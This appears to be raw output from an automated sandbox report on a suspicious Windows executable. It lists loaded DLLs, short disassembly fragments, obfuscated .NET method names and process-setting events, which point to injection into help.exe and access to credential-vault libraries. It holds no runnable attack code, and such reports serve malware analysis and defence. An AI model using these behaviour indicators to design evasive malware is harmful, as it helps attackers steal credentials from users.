Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06EDAC82 pushad ; iretd	4_2_06EDACE1
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06ED7DC0 push 9C06EB59h; ret	4_2_06ED7DC5
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06ED78E8 pushfd ; ret	4_2_06ED78F1
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00404956 push CD785CF3h; ret	9_2_00404960
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004051F5 push ebx; retf	9_2_004051FA
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004139A3 push esi; ret	9_2_004139AA
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00405A87 push ecx; retf	9_2_00405A91
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0041ABE3 push esi; ret	9_2_0041ABEA
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00417C4D push 00000024h; ret	9_2_00417C4F
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00418C73 push eax; ret	9_2_00418D0A
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004034F0 push eax; ret	9_2_004034F2
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00417570 push edx; retf	9_2_00417596
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040951E pushfd ; iretd	9_2_0040955D
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004185A9 push A3C436E7h; ret	9_2_004185CB
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00404EC1 push ecx; iretd	9_2_00404EC6
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004096CB push ebp; retf	9_2_004096DB
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0041074B push 3788F9D1h; ret	9_2_00410752
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040D709 push esp; iretd	9_2_0040D70A
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00417FCA push ebx; retf	9_2_00417FDD
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004117D3 push edi; ret	9_2_004117DA
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0148225F pushad ; ret	9_2_014827F9
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014827FA pushad ; ret	9_2_014827F9
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014B09AD push ecx; mov dword ptr [esp], ecx	9_2_014B09B6
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0148283D push eax; iretd	9_2_01482858
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0148135E push eax; iretd	9_2_01481369
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030709AD push ecx; mov dword ptr [esp], ecx	12_2_030709B6
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02682260 push esi; iretd	12_2_02682261
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02682244 push cs; retf	12_2_02682249
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02686228 push ebx; iretd	12_2_0268622D
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0267E2E0 push edi; ret	12_2_0267E2E7
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_0268407D push edx; retf	12_2_026840A3

Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, NCySI4oINoomWXjoaH.cs	High entropy of concatenated method names: 'WwhFSvC97H', 'RNEFPYh4nZ', 'eiWF4ULAqF', 'vRCFwuOFvH', 'E3xFfc220p', 'oKpF8DXMly', 'tOyFclEeYj', 'L0lFhxg9lK', 'SMMFWIOoiR', 'k3gF5VvMRJ'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, pFiZD0ClVhG7NOhPh5.cs	High entropy of concatenated method names: 'RpSR1ZfCwn', 'nPjR9YhBgA', 'rl0RIuIrsH', 'MvcRtStfyM', 'Yi6RFCpn6J', 'g6nRZPmKPD', 'Next', 'Next', 'Next', 'NextBytes'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, GF2i84zRbMjXJTfTF2.cs	High entropy of concatenated method names: 'qEjRxAnjFK', 'jCZR3kugZQ', 'LTIRpCSiTn', 'vN9RSl37or', 'TSnRPPQDPH', 'cveRweqi7W', 'gPRRfqEwi9', 'hD5Rny03wT', 'UX1R0FfJ5p', 'guwR7OOteJ'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, p8Mer2RF4vMy80FijJ.cs	High entropy of concatenated method names: 'GUI23bPJXK', 'eBS2pWPHww', 'es92Sxv2Aw', 'gUD2P6xuDi', 'zK72wTRK1e', 'scr2fcb9xk', 'vCe2cZMXIA', 'C7H2hloMdM', 'Y1e25xlNQf', 'XG32Y28t9Q'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, d0jOFQqq38iuTX5oTti.cs	High entropy of concatenated method names: 'UDdReAOjxu', 'jIwRzj77jb', 'XiKoGJf5Bm', 'XM9oBeOajc', 'SpooVuU2Cc', 'zWroqjESbx', 'RMoo6qvmi7', 'DK6ojTicoB', 'KXsoD89hoy', 'g4uoJVhKLa'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, aILEiaaqSuKoNq34aS.cs	High entropy of concatenated method names: 'cHv1UdE5Q0', 'dyO1xfAXLO', 'hii13hOC4B', 'g5a1p1Japw', 'Jv81AtfwLH', 'Dco1gUW90O', 'bdB1bKgPYp', 'B6D1LbDs7E', 'BoM1Flcviy', 'Lgw1RY4FGo'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, DSKT81yeBjZ54YhnKS.cs	High entropy of concatenated method names: 'EXVtDlC6yf', 'GjDt13FXFg', 'EvGtI7sw0C', 'PsuIewlR0F', 'eY5IztDVcb', 'iNOtGWk2kP', 'DcgtBqAbYA', 'DxLtVg2CQx', 'kx6tqDA8gA', 'dtKt6EvLfr'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, rhL7Cp37IKU9FIO2K6.cs	High entropy of concatenated method names: 'vOfqjrFaFO', 'extqDGyoR4', 'v2sqJ9ElT4', 'Oqqq1c1co5', 'i4Hq9VsXJH', 'gBTqIBByw7', 'lx4qttTRky', 'RmFqZ4Gfeq', 'gmkqNvL49t', 'R7TqCJn7YU'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, nwHV7PdZAxhpsLyfHT.cs	High entropy of concatenated method names: 'uB5FAmh6Cn', 'QeOFbGTTnD', 'BbSFFanxNY', 'XCLFoHT8oy', 'VSoFdG8j1H', 'fUTFn5oRTs', 'Dispose', 'BnfLD6wGYk', 'Xd6LJlxvha', 'ynZL161x40'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, KoxcMPcgbZQ33WWX41.cs	High entropy of concatenated method names: 'AvsBtk0SQV', 'QaUBZXYmP3', 'mpsBCisU8f', 'fnTBuLvsre', 'uvpBA7sl64', 'ftXBgB6xZT', 'ipkDJDeL2l5F3kQpV0', 'l4i2irCmYc8SbEON48', 'luDBB1sopp', 'adbBqRlbBf'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, s6I0QY5IYdxC4XKgO8.cs	High entropy of concatenated method names: 'OcnXXQFDl', 'FSdUjF0Dj', 'PCtxFNmwM', 'S8EMV26x8', 'P9wpjPy6H', 'tavv4tuMi', 'Q5x4AaXxobZ1gIC5Dj', 'oPur3PpYKmqUyqZwJc', 'jlhLZT0uw', 'rxqR8BSoH'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, lhrnfjql53qAkk9iXEZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dh1RYO666I', 'hFdRa7vN9D', 'eZ1RTGIS0g', 'JeXRH8Mnsy', 'TgURrP33mK', 'jcxROT4xKs', 'kYgRkctxIo'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, CJaHFx8Tv4QCU9lmy1.cs	High entropy of concatenated method names: 'zPSbC4wlDD', 'FsCbuxsXxF', 'ToString', 'GtHbD6jr3T', 'Q1hbJtfuNK', 'HC7b14G55O', 'NpIb9aV8mY', 'vrabIJLqWQ', 'OD0bthffuU', 'b0tbZixoxy'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, AwvSaOuHP6crqMT5FH.cs	High entropy of concatenated method names: 'M8pIOBXGN6', 'MZ1IkxKRKb', 'Gb8IEdBHB1', 'ToString', 'kJtIsVTY5n', 'gpxIQKcHn4', 'lQjpvIq0EvuPfDPL3B2', 'Vra19SqHTHhhyemK70u'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, k5IPhat8yxFcUYaHDS.cs	High entropy of concatenated method names: 'oYr9KY1Qak', 'V3C9MRfnH1', 'Vt114gUEs0', 'A8H1wU6u30', 'fqr1fwcRyi', 'Cmp18DBX0L', 'dDU1cHTyG1', 'ly51hBC4lw', 'Htx1W6IOFF', 'cFk15jdcRj'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, OyNQdE1PSWaZ65OiRC.cs	High entropy of concatenated method names: 'OSdt0ViEhA', 'DF7t7ntKXv', 'So6tX4eGjU', 'E7etUmFyFM', 'PT9tKUg8dG', 'JVotxN0VHP', 'Nr0tM70lST', 'R0st3BOGn5', 'RDotphVOQc', 'eUjtvnFmiF'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, XObCDMpFBNccHHSiBL.cs	High entropy of concatenated method names: 'pmIIjARJOZ', 'FYuIJxxRSW', 'QSNI9beQg6', 'T3GItePiEX', 'gxFIZYnsjy', 'jlA9EiusuF', 'pdS9s98AxO', 'bHf9QCnEXy', 'h0N9lMS9I6', 'vYy9i5dS9w'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, zkXrP0qcCo4eUZYOL4t.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IVRmFCoRt7', 'zvbmRQlM45', 'kjLmoGTKH3', 'lXImmRWG8R', 'rqPmd4Jqqp', 'dSAmyyXQd6', 'pWHmnpsq5l'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, x1PlpQNykapxVHT8OI.cs	High entropy of concatenated method names: 'LmEA5GunuE', 'xqqAa3mX2L', 'oOYAHuorY2', 'tMUArcK9Qq', 'wGXAPPG4W6', 'XCZA4P4oQ6', 'p7yAwFwIlZ', 'IJ9Afoe6X7', 'f1YA8q7U3d', 'MocAcv2yxA'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, h7ShcV770PyZ0AADup.cs	High entropy of concatenated method names: 'Sb1JHDlV70', 'S9pJrRaPIu', 'NCGJOF36Xx', 'CoEJkYN4LJ', 'F0YJEiAZ4p', 'JJdJsZdq9l', 'lZ5JQbLfEG', 'JatJl4r097', 'AoaJiladWl', 'DmjJeGRPgc'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, MFTqDGkPMepJ2sVKpg.cs	High entropy of concatenated method names: 'Dispose', 'TOGBimpkpW', 'C1PVPSqPyk', 'FvLmEX8VML', 'wVeBeHQAdU', 'qQPBz3Y2p3', 'ProcessDialogKey', 'mInVG5OAO9', 'Bb7VBPmKt4', 'Vt6VVXBmeR'
Source: 4.2.AAHiVVNIKQESryT.exe.8ae0000.4.raw.unpack, CdxAFr6Zw2Tw84lc86.cs	High entropy of concatenated method names: 'haSbl6Z3s3', 'wFbbewEMl0', 'IubLGHabvJ', 'SpTLBRf9WE', 'zZKbYmatOM', 'vVXbaFCrIo', 'BbabTNVaSg', 'XRybHTIn89', 'fQ7brk310x', 'PV7bOroteL'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
